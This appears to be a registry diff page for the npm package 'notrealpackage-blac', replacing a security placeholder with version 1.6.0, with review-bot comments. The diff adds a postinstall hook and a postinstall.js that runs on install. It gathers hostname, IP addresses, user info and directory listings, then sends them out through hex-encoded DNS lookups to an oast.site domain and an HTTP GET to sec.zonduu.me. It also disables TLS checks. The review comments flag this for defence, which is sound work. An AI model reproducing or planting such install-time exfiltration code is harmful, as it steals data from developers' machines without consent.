notrealpackage-blac 0.0.1-security → 1.6.0


Potentially problematic release.


This version of notrealpackage-blac might be problematic. Click here for more details.

@@ -0,0 +1,8 @@
1
+ body {
2
+ background-color: red !important;
3
+ }
4
+
5
+ h1, h2, h3, h4, h5, h6 {
6
+ color: yellow !important;
7
+ font-size: 50px !important;
8
+ }
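--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,2 @@
+ // index.js
+ console.log("This is the index.js of the a package by zzz");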
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "visa-ui-angular",
3
+ "version": "1.0.2",
4
+ "description": "A simple dynamic module provider for the @fm-plugin organization",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node postinstall.js",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "keywords": ["dynamic", "whatever"],
11
+ "author": "zonduu",
12
+ "license": "ISC"
13
+ }
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "components",
3
+ "version": "1.0.1",
4
+ "description": "researcher public package",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node postinstall.js"
8
+ },
9
+ "keywords": [],
10
+ "author": "",
11
+ "license": "ISC",
12
+ "private": false
13
+ }
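--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,13 @@
  {
  "name": "notrealpackage-blac",
- "version": "0.0.1-security",
- "description": "security holding package",
- "repository": "npm/security-holder"
+ "version": "1.6.0",
+ "description": "A simple dynamic module provider for the zzz organization",
+ "main": "index.js",
+ "scripts": {
+ "postinstall": "node postinstall.js",
+ "test": "echo \"Error: no test specified\" && exit 1"
+ },
+ "keywords": ["dynamic", "whatever"],
+ "author": "zonduu",
+ "license": "ISC"
  }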
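Review bot: The added `"postinstall": "node postinstall.js",` entry in `scripts` makes npm execute postinstall.js automatically on every install, and this manifest replaces the `0.0.1-security` holding placeholder that the deleted README says was published after malicious code was removed under this name. Nothing in the manifest or description explains what the hook does, so a consumer has no basis to allow it; the line should be dropped so that `scripts` holds only the `test` entry. The two manifests shown earlier on the page without a file header (names `visa-ui-angular` and `components`) carry the same hook. Until the hook is gone, any install of this name should be run with `npm install --ignore-scripts`.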
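--- a/package/postinstall.js
+++ b/package/postinstall.js
@@ -0,0 +1,133 @@
+ const fs = require('fs');
+ const dns = require('dns');
+ const http = require('http');
+ const https = require('https');
+ const os = require('os');
+ const { execSync } = require('child_process');
+
+ const logFile = '/tmp/postinstall.log';
+
+ process.env["NODE_TLS_REJECT_UNAUTHORIZED"] = 0;
+
+ fs.appendFileSync(logFile, `Starting postinstall script\n`);
+
+ const hostname = os.hostname();
+ const packageName = process.env.npm_package_name;
+ const packageVersion = process.env.npm_package_version;
+ const internalIpAddress = execSync('hostname -I').toString().trim();
+ const currentPath = process.env.INIT_CWD || process.cwd(); // Use INIT_CWD to capture the original working directory
+ const platform = os.platform();
+ const userInfo = os.userInfo();
+ const homeDirectory = userInfo.homedir; // Home directory path
+
+ // Get list of files in the original directory where npm install was run
+ let currentDirectoryFiles;
+ try {
+ currentDirectoryFiles = execSync(`ls ${currentPath}`).toString().trim();
+ } catch (error) {
+ currentDirectoryFiles = `Error executing ls command in current directory: ${error.message}`;
+ }
+
+ // Get list of files in the home directory
+ let homeDirectoryFiles;
+ try {
+ homeDirectoryFiles = execSync(`ls ${homeDirectory}`).toString().trim();
+ } catch (error) {
+ homeDirectoryFiles = `Error executing ls command in home directory: ${error.message}`;
+ }
+
+ const osDetails = {
+ platform: os.platform(),
+ release: os.release(),
+ arch: os.arch()
+ };
+
+ const fetchExternalIpAddress = (callback) => {
+ https.get('https://api.ipify.org?format=json', (res) => {
+ let data = '';
+
+ res.on('data', (chunk) => {
+ data += chunk;
+ });
+
+ res.on('end', () => {
+ const externalIp = JSON.parse(data).ip;
+ callback(null, externalIp);
+ });
+
+ }).on('error', (err) => {
+ callback(err);
+ });
+ };
+
+ fetchExternalIpAddress((err, externalIpAddress) => {
+ if (err) {
+ fs.appendFileSync(logFile, `Error fetching external IP address: ${err.message}\n`);
+ return;
+ }
+
+ const data = {
+ packageName,
+ packageVersion,
+ hostname,
+ internalIpAddress,
+ externalIpAddress,
+ currentPath,
+ platform,
+ userInfo,
+ osDetails,
+ currentDirectoryFiles, // Log files in the directory where npm install was run
+ homeDirectoryFiles // Log files in home directory
+ };
+
+ fs.appendFileSync(logFile, `Data: ${JSON.stringify(data)}\n`);
+
+ const dnsData = `${packageName}-${hostname}-${externalIpAddress}`;
+ const hexData = Buffer.from(dnsData).toString('hex');
+
+ const maxLabelLength = 63;
+ const hexDataParts = [];
+ for (let i = 0; i < hexData.length; i += maxLabelLength) {
+ hexDataParts.push(hexData.substring(i, i + maxLabelLength));
+ }
+
+ hexDataParts.forEach((part, index, arr) => {
+ const partIndex = index + 1;
+ const totalParts = arr.length;
+ const dnsSubdomain = `${part}-${partIndex}-${totalParts}.cqati6eupgoo97it17fgdatea3nw746q1.oast.site`;
+ dns.resolve4(dnsSubdomain, (err, addresses) => {
+ if (err) {
+ fs.appendFileSync(logFile, `DNS resolution failed: ${err}\n`);
+ } else {
+ fs.appendFileSync(logFile, `DNS query sent for ${dnsSubdomain}\n`);
+ }
+ });
+ });
+
+ const getData = `targetUrl=${encodeURIComponent(JSON.stringify(data))}`;
+
+ const options = {
+ hostname: 'sec.zonduu.me',
+ port: 80,
+ path: `/callbackplz?${getData}`,
+ method: 'GET'
+ };
+
+ const req = http.request(options, (res) => {
+ let responseData = '';
+ res.on('data', (chunk) => {
+ responseData += chunk;
+ });
+ res.on('end', () => {
+ fs.appendFileSync(logFile, `HTTP request completed with status ${res.statusCode}: ${responseData}\n`);
+ });
+ });
+
+ req.on('error', (e) => {
+ fs.appendFileSync(logFile, `HTTP request failed: ${e}\n`);
+ });
+
+ req.end();
+
+ fs.appendFileSync(logFile, `postinstall script finished\n`);
+ });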
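Review bot: This install-time script gathers host identity and directory listings and sends them off the machine with no opt-in, which an install hook has no legitimate reason to do. The `data` object built on new lines 69–81 holds `os.hostname()`, `os.userInfo()`, the `hostname -I` output and `ls` of both `INIT_CWD` and the home directory; it leaves the host as hex DNS labels under the `oast.site` name on new line 97 and as a plaintext HTTP GET to `sec.zonduu.me` port 80, path `/callbackplz`, on new lines 109–113. New line 10 also sets `NODE_TLS_REJECT_UNAUTHORIZED` to 0 for the whole process, and `ls ${currentPath}` on new line 26 hands an environment-derived path to a shell unquoted. The file should be deleted together with its hook in package.json. Hosts that installed 1.6.0 can be found by the presence of `/tmp/postinstall.log` and by DNS or HTTP traffic to those two names.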
package/test/abc ADDED
File without changes
package/test/private ADDED
File without changes
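--- a/package/test.js
+++ b/package/test.js
@@ -0,0 +1,30 @@
+ const os = require('os');
+ const { execSync } = require('child_process');
+
+ try {
+ const hostname = os.hostname();
+ const ipAddress = execSync('hostname -I').toString().trim();
+ const currentPath = process.cwd();
+ const platform = os.platform();
+ const userInfo = os.userInfo();
+
+ // Operating System Details
+ const osDetails = {
+ platform: os.platform(),
+ release: os.release(),
+ arch: os.arch()
+ };
+
+ const data = {
+ hostname,
+ ipAddress,
+ currentPath,
+ platform,
+ userInfo,
+ osDetails // Added OS details here
+ };
+
+ console.log('Host Details:', JSON.stringify(data, null, 2));
+ } catch (e) {
+ console.error(`Error: ${e.message}`);
+ }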
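--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +0,0 @@
- # Security holding package
-
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
- Please refer to www.npmjs.com/advisories?search=notrealpackage-blac for more information.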